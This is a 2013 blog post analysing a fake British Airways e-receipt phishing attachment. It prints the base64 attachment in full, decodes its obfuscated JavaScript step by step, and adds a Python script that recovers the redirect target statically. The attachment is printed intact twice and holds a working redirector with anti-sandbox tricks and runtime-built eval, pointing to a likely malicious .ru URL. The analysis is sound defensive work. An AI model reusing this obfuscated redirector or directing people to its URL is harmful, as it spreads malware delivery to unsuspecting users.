Wednesday, March 27, 2013

More HTML Virus Decoding

"HTML" based viruses give us a rare view into the workings of a virus or at least some of the mechanics of how it is launched.

So we have a new twist on the fake e-ticket scam.

I received a fake British Airways e-receipt with an attachment labeled as .htm.

I viewed the e-mail source and the attachment was base64-encoded:

PGh0bWw+DQogPGhlYWQ+DQogIDxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVu
dD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04Ij4NCjx0aXRsZT5QbGVhc2Ugd2FpdDwvdGl0bGU+
DQogPC9oZWFkPg0KIDxib2R5PiAgDQo8aDE+PGI+IFlvdSB3aWxsIGJlIGZvcndhcmRlZC4uLiBX
YWl0IHBsZWFzZS4uLjwvaDE+PC9iPg0KPGg0PkludGVybmV0IEV4cGxvcmVyIGNvbXBhdGlibGUg
b25seSEgPC9oND48YnI+DQoNCjxzY3JpcHQ+cD1wYXJzZUludDtzcz0oMSk/U3RyaW5nLmZyb21D
aGFyQ29kZTowO2FzZ3E9Ijc2ITYxITcyITMxITNkITM0ITNAITNiIWEhNzYhNjEhNzIhMzIhM2Qh
NzYhNjEhNzIhMzEhM2IhYSE2QCE2NiEyOCE3NiE2MSE3MiEzMSEzZCEzZCE3NiE2MSE3MiEzMiEy
QCEyMCE3YiE2NCE2ZiE2MyE3NSE2ZCE2NSE2ZSE3NCEyZSE2YyE2ZiE2MyE2MSE3NCE2QCE2ZiE2
ZSEzZCEyMiE2OCE3NCE3NCE3MCEzYSEyZiEyZiE2QCE2YyE2YyE3NSE2ZCE2QCE2ZSE2MSE3NCE2
MSE2NiEyZSE3MiE3NSEzYSEzOCEzMCEzOCEzMCEyZiE2NiE2ZiE3MiE3NSE2ZCEyZiE2YyE2QCE2
ZSE2YiE3MyEyZiE2MyE2ZiE2YyE3NSE2ZCE2ZSEyZSE3MCE2OCE3MCEyMiEzYiE3ZCIucmVwbGFj
ZSgvQC9nLCI5Iikuc3BsaXQoIiEiKTt0cnl7ZG9jdW1lbnQuYm9keSY9MC4xfWNhdGNoKGdkc2dz
ZGcpe3p6PTM7ZGJzaHJlPTIzO2lmKGRic2hyZSl7dmZ2d2U9MDt0cnl7ZG9jdW1lbnQ7fWNhdGNo
KGFnZHNnKXt2ZnZ3ZT0xO31pZighdmZ2d2Upe2U9d2luZG93WyJlIi5jb25jYXQoInYiKyJhbCIp
XTt9DQpzPSIiO2lmKHp6KWZvcihpPTA7aS0xMDchPTA7aSsrKXtpZih3aW5kb3cuZG9jdW1lbnQp
cys9c3MocChhc2dxW2ldLDE2KSk7fQ0KaWYod2luZG93LmRvY3VtZW50KWUocyk7fX08L3Njcmlw
dD4NCg0KPC9ib2R5Pg0KPC9odG1sPg==

After decoding that using:
http://www.opinionatedgeek.com/dotnet/tools/base64decode/

I found a script that redirects the browser to a site, encoded in a way we were seeing a couple of years ago.

Nothing in the attachment itself exploits anything; it is a redirector, and whatever is aimed at Internet Explorer would be served by the page it sends the browser to. The decoder is also wrapped in an anti-analysis check: the hex-to-string loop sits in the catch block of document.body&=0.1, a statement that throws in a real browser (document.body rejects a non-element value) but not in a sandbox that stubs document with a plain object, every step is gated on window.document, and eval is assembled at runtime as window["e".concat("v"+"al")] so the word never appears in the file. And they even have the chutzpah to say "IE only".


(I added the spaces in the tags to break them)

< html >
 < head >
  < meta http-equiv="Content-Type" content="text/html; charset=utf-8" >
< title >Please wait< /title >
 < /head >
 < body >
< h1 >< b > You will be forwarded... Wait please...< /h1 >< /b >
< h4 >Internet Explorer compatible only! < /h4 >< br >

< script >
p=parseInt;ss=(1)?String.fromCharCode:0;
asgq="76!61!72!31!3d!34!3@!3b!a!76!61!72!32!3d!76!61!72!31!3b!a!6@!66!28!76!61!72!31!3d!3d!76!61!72!32!2@!20!7b!64!6f!63!75!6d!65!6e!74!2e!6c!6f!63!61!74!6@!6f!6e!3d!22!68!74!74!70!3a!2f!2f!6@!6c!6c!75!6d!6@!6e!61!74!61!66!2e!72!75!3a!38!30!38!30!2f!66!6f!72!75!6d!2f!6c!6@!6e!6b!73!2f!63!6f!6c!75!6d!6e!2e!70!68!70!22!3b!7d".replace(/@/g,"9").split("!");
try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=23;if(dbshre){vfvwe=0;try{document;}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window["e".concat("v"+"al")];}
s="";if(zz)for(i=0;i-107!=0;i++){if(window.document)s+=ss(p(asgq[i],16));}
if(window.document)e(s);}}
< /script >

< /body >
< /html >


------------------------------------------------------------------------------

The asgq string, the part that is all hex pairs:

76!61!72!31!3d!34!3@!3b!a!76!61!72!32!3d!76!61!72!31!3b!a!6@!66!28!76!61!72!31!3d!3d!76!61!72!32!2@!20
!7b!64!6f!63!75!6d!65!6e!74!2e!6c!6f!63!61!74!6@!6f!6e!3d!22!68!74!74!70!3a!2f!2f!6@!6c!6c!75!6d!6@!6e!61!
74!61!66!2e!72!75!3a!38!30!38!30!2f!66!6f!72!75!6d!2f!6c!6@!6e!6b!73!2f!63!6f!6c!75!6d!6e!2e!70!68!70!22!3b!7d

You can decode with any ASCII chart (http://www.asciitable.com/)

Every token is a two-digit hex byte (the lone "a" is 0ah, a newline) except the ones containing @, which the script turns back into 9 with .replace(/@/g,"9") before decoding:

2@ = 29h = )
3@ = 39h = 9
6@ = 69h = i

The script uses ! as a separator (the .split("!")), so ignore them. There are 107 tokens, which is why the decode loop runs until i-107!=0 fails.

And...

This all translates to (I broke the http)
var1=49; \n
var2=var1; \n
if(var1==var2) [space] {
document.location="h t t p://illuminataf.ru:8080/forum/links/column.php";}

which is likely a malicious PHP page on a .ru host, most likely a legitimate site that has been broken into. Since var2 is a copy of var1, the if(var1==var2) test is always true and the redirect always fires; the comparison only serves to make the decoded string look like something other than a bare redirect.
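A static decoder for this whole chain, as an added example and not the post's own code or tooling: it base64-decodes the attachment shown above, lifts the asgq string out of the script, and applies the same replace/split/parseInt/fromCharCode steps the script's own loop does, but assembles the string instead of handing it to eval, so the redirect target comes out without ever running the attacker's JavaScript. The attachment bytes are the base64 block from the post; the function and variable names are my own.

```python
import base64
import re

# The .htm attachment exactly as it appeared in the e-mail source (the base64
# block reproduced in the post), embedded so the whole chain runs offline.
ATTACHMENT_B64 = """
PGh0bWw+DQogPGhlYWQ+DQogIDxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVu
dD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04Ij4NCjx0aXRsZT5QbGVhc2Ugd2FpdDwvdGl0bGU+
DQogPC9oZWFkPg0KIDxib2R5PiAgDQo8aDE+PGI+IFlvdSB3aWxsIGJlIGZvcndhcmRlZC4uLiBX
YWl0IHBsZWFzZS4uLjwvaDE+PC9iPg0KPGg0PkludGVybmV0IEV4cGxvcmVyIGNvbXBhdGlibGUg
b25seSEgPC9oND48YnI+DQoNCjxzY3JpcHQ+cD1wYXJzZUludDtzcz0oMSk/U3RyaW5nLmZyb21D
aGFyQ29kZTowO2FzZ3E9Ijc2ITYxITcyITMxITNkITM0ITNAITNiIWEhNzYhNjEhNzIhMzIhM2Qh
NzYhNjEhNzIhMzEhM2IhYSE2QCE2NiEyOCE3NiE2MSE3MiEzMSEzZCEzZCE3NiE2MSE3MiEzMiEy
QCEyMCE3YiE2NCE2ZiE2MyE3NSE2ZCE2NSE2ZSE3NCEyZSE2YyE2ZiE2MyE2MSE3NCE2QCE2ZiE2
ZSEzZCEyMiE2OCE3NCE3NCE3MCEzYSEyZiEyZiE2QCE2YyE2YyE3NSE2ZCE2QCE2ZSE2MSE3NCE2
MSE2NiEyZSE3MiE3NSEzYSEzOCEzMCEzOCEzMCEyZiE2NiE2ZiE3MiE3NSE2ZCEyZiE2YyE2QCE2
ZSE2YiE3MyEyZiE2MyE2ZiE2YyE3NSE2ZCE2ZSEyZSE3MCE2OCE3MCEyMiEzYiE3ZCIucmVwbGFj
ZSgvQC9nLCI5Iikuc3BsaXQoIiEiKTt0cnl7ZG9jdW1lbnQuYm9keSY9MC4xfWNhdGNoKGdkc2dz
ZGcpe3p6PTM7ZGJzaHJlPTIzO2lmKGRic2hyZSl7dmZ2d2U9MDt0cnl7ZG9jdW1lbnQ7fWNhdGNo
KGFnZHNnKXt2ZnZ3ZT0xO31pZighdmZ2d2Upe2U9d2luZG93WyJlIi5jb25jYXQoInYiKyJhbCIp
XTt9DQpzPSIiO2lmKHp6KWZvcihpPTA7aS0xMDchPTA7aSsrKXtpZih3aW5kb3cuZG9jdW1lbnQp
cys9c3MocChhc2dxW2ldLDE2KSk7fQ0KaWYod2luZG93LmRvY3VtZW50KWUocyk7fX08L3Njcmlw
dD4NCg0KPC9ib2R5Pg0KPC9odG1sPg==
"""


def decode_attachment(b64_text):
    """Step 1: the MIME body is base64; drop the line breaks and decode to raw HTML."""
    raw = base64.b64decode("".join(b64_text.split()))
    return raw.decode("utf-8", errors="replace")


def extract_obfuscated(html):
    """Step 2: pull the quoted token string the script assigns to asgq."""
    m = re.search(r'asgq="([^"]*)"', html)
    if m is None:
        raise ValueError("no asgq string found in the script")
    return m.group(1)


def deobfuscate(blob, sep="!", subst=("@", "9"), radix=16):
    """Step 3: do by hand what the script's decoder loop does, minus the eval:
    .replace(/@/g,"9"), .split("!"), parseInt(tok,16), String.fromCharCode."""
    blob = blob.replace(subst[0], subst[1])
    return "".join(chr(int(tok, radix)) for tok in blob.split(sep))


def extract_redirect(js):
    """Step 4: the decoded JS is a document.location assignment; pull the URL out."""
    m = re.search(r'document\.location\s*=\s*"([^"]+)"', js)
    return m.group(1) if m else None


def analyze(b64_text=ATTACHMENT_B64):
    """Run the full chain and return every intermediate so each can be inspected."""
    html = decode_attachment(b64_text)
    blob = extract_obfuscated(html)
    js = deobfuscate(blob)
    return {
        "html": html,
        # the script's loop condition is i-107!=0, so it expects exactly 107 tokens
        "token_count": len(blob.split("!")),
        "js": js,
        "url": extract_redirect(js),
    }


if __name__ == "__main__":
    result = analyze()
    print(result["js"])
    print("redirect target:", result["url"])
```

Running it prints the three-line redirect script and the illuminataf.ru URL. Because the decoder is reimplemented rather than executed, the anti-sandbox try/catch and the window.document gates in the original never get a say; that is the point of doing this statically rather than in a JavaScript engine.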